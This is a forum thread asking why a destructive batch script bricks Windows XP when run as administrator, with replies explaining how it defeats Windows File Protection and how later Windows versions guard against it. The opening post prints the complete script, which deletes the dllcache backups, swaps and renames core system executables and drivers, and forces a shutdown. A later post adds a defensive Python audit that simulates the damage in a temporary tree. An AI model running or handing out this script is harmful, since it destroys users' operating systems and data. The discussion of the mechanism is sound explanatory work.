XP security

I was amazed when I tried running this script in a VM as an admin (as many people do) and found that it did indeed manage to brick the install. Surely a script kiddie would be foiled by rudimentary OS security?

Code:
@echo off
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe"
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys"
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10
tskill explorer
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA 
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA 
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA

I was under the impression that all of these would surely either have sharing violations on them or complete file permissions failures.

Can someone explain to me how this manages to work and why people on XP still insist on running XP as admin?
 
I'm actually surprised that worked inside of Windows.

That seems crazy when you think about it.

Have you tried just running parts of it at a time? I'm just surprised it let you rename explorer.exe.
 
I'm actually surprised that worked inside of Windows.

That seems crazy when you think about it.

Have you tried just running parts of it at a time? I'm just surprised it let you rename explorer.exe.

Indeed. I was just as amazed. I ran the top bit before the shutdown command. No errors bar the copying of Task Manager.
 
I'm actually surprised that worked inside of Windows.

That seems crazy when you think about it.

Have you tried just running parts of it at a time? I'm just surprised it let you rename explorer.exe.

Running as an admin it did what I expected... though I would have thought

DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"

would have failed due to being open... (though my thinking is obviously wrong)
 
That is a bit worrying. And strangely irritating, since there have been so many times I couldn't delete a bloody text file I had created - never mind running, critical OS executables! :p
 
You can do anything you like as admin. I don't get why you are surprised. You can brick any OS by running similar destructive commands as the root user.

As to why people run as admin? Windows makes the default user the admin when you install it. People neither know, nor care, to change from this default.
 
It is almost never a good idea to move, rename or delete core OS executables. The surprise is more in that the OS let it happen without any complaints, rather than it being possible.
 
The reason it works is that the exe files in the dllcache folder are not in use (hence not locked); these are backups for use by Windows File Protection. As admin you can delete these.

You can't however delete the exes in c:\windows\, e.g. c:\windows\explorer.exe, because it is in use/locked, but you can rename them (as per the script). Rename is only changing NTFS header/node information, not the data on disk, so you can get away with it.

Once you delete the secure backup copy in dllcache and rename the main c:\windows executable, on the next boot it can neither repair from the cache nor find the executable, as it has been renamed.

So it works because you're an admin and because you're pwning the WFP feature that would fix the system if you only deleted/renamed c:\windows\explorer.exe without messing with the backup cache.
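The mechanism described above (locked live copy, unlocked dllcache backup, WFP repair at next boot) can be checked for from a defender's side: for each protected file, does the live copy still exist, does its dllcache backup still exist, and do the two match? The audit below is an added example, not code from the thread; the directory layout, the protected-file list and the fake file contents in build_demo_tree are constructed for the demo, and the "damaged" branch only mimics part of what the thread's script does to a temporary tree.

```python
"""Audit a Windows File Protection layout: compare each protected live file with
its dllcache backup and say whether WFP could still repair it at next boot."""
from pathlib import Path

# Files the thread's script targets, as paths relative to the Windows directory.
PROTECTED = ["system32/winlogon.exe", "system32/services.exe", "explorer.exe",
             "system32/taskmgr.exe", "system32/drivers/vga.sys", "system32/drivers/mup.sys"]

def audit(windows_root):
    """Return {relative_path: state}. States: ok; swapped (live content differs
    from the backup); repairable (live gone, backup present); backup_missing
    (live present but nothing to restore from); unrecoverable (both gone)."""
    root = Path(windows_root)
    cache = root / "system32" / "dllcache"   # dllcache is flat: one entry per file name
    report = {}
    for rel in PROTECTED:
        live, backup = root / rel, cache / Path(rel).name
        if live.is_file() and backup.is_file():
            same = live.read_bytes() == backup.read_bytes()
            report[rel] = "ok" if same else "swapped"
        elif backup.is_file():
            report[rel] = "repairable"
        elif live.is_file():
            report[rel] = "backup_missing"
        else:
            report[rel] = "unrecoverable"
    return report

def build_demo_tree(base, damaged=False):
    """Create a constructed miniature WINDOWS tree with fake file contents. With
    damaged=True, mimic part of the thread's script: drop two backups, rename
    explorer.exe away, remove one live driver and swap winlogon/services."""
    root = Path(base) / "WINDOWS"
    cache = root / "system32" / "dllcache"
    cache.mkdir(parents=True, exist_ok=True)
    for rel in PROTECTED:
        live = root / rel
        live.parent.mkdir(parents=True, exist_ok=True)
        live.write_bytes(b"fake binary " + Path(rel).name.encode())
        (cache / Path(rel).name).write_bytes(live.read_bytes())
    if damaged:
        (cache / "explorer.exe").unlink()
        (cache / "taskmgr.exe").unlink()
        (root / "explorer.exe").rename(root / "explorer1.exe")
        (root / "system32" / "drivers" / "vga.sys").unlink()
        s32 = root / "system32"
        (s32 / "services.exe").rename(s32 / "explorer1.exe")
        (s32 / "winlogon.exe").rename(s32 / "services.exe")
        (s32 / "explorer1.exe").rename(s32 / "winlogon.exe")
    return root
```

Anything reported as backup_missing is the quiet case: the system still runs, but WFP has nothing left to restore from, so the damage only shows up after the next rename or reboot.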
 
Which begs the question, why let even admins delete backup dlls/files without any kind of prompt/warning/prevention?

Yes Admins should have mighty powers to do with as they wish, but one would hope the OS isn't that trusting. I am quite confident my doctor knows what she is doing, doesn't mean I'd be OK with her hacking off a limb! :p
 
Which begs the question, why let even admins delete backup dlls/files without any kind of prompt/warning/prevention?

Yes Admins should have mighty powers to do with as they wish, but one would hope the OS isn't that trusting. I am quite confident my doctor knows what she is doing, doesn't mean I'd be OK with her hacking off a limb! :p

Yeah, I agree, maybe MS could have designed WFP slightly better and put its backups in a separate locked read-only partition or something. I think though you have to have the all-powerful admin, and you can't really double-prompt on file delete without a kernel-level blacklist. I think it would just get messy from an OS design point of view. Far easier to just trust the admin knows what he's doing and shift the work onto him :D

Still, XP has always had admin overuse problems, and this is not so much of an issue on new, up-to-date OSes.
 
Which begs the question, why let even admins delete backup dlls/files without any kind of prompt/warning/prevention?

Yes Admins should have mighty powers to do with as they wish, but one would hope the OS isn't that trusting. I am quite confident my doctor knows what she is doing, doesn't mean I'd be OK with her hacking off a limb! :p

In all fairness, I like proper God mode, it can be very useful to just be able to do what you know is correct. However, this power should not be bestowed on a user lightly.
 
Does anyone have a Vista/7 VM they could try this on? I take it it wouldn't work with the new security model?

On Vista+ it's much better.

Windows Resource Protection replaced Windows File Protection; files are now stored in c:\windows\winsxs rather than dllcache, and only 'TrustedInstaller' can modify these, so even an administrator can't touch them. However, as an admin you can take ownership of the files and then do it, but it's a good extra hurdle.
 
Well yeah, I'd be annoyed if I couldn't do something. But there is a serious problem when a script can do all that damage in just a few seconds.

Although I suppose this is what UAC and other measures are designed to address. Still bloody worrying to think how easy it is to screw over XP.
 
Yup, renames of "in-use" files are a common thing.

In fact, I have used it fairly regularly when trying to update an application in use from a shared folder on a server.

The existing process continues to use the newly renamed application, but any subsequent calls to the executable will load the newer version.

Then, when I'm sure that all old processes are no longer in use (by looking at "Open Files" in Computer Management) I can delete the old, now-renamed, executable.
 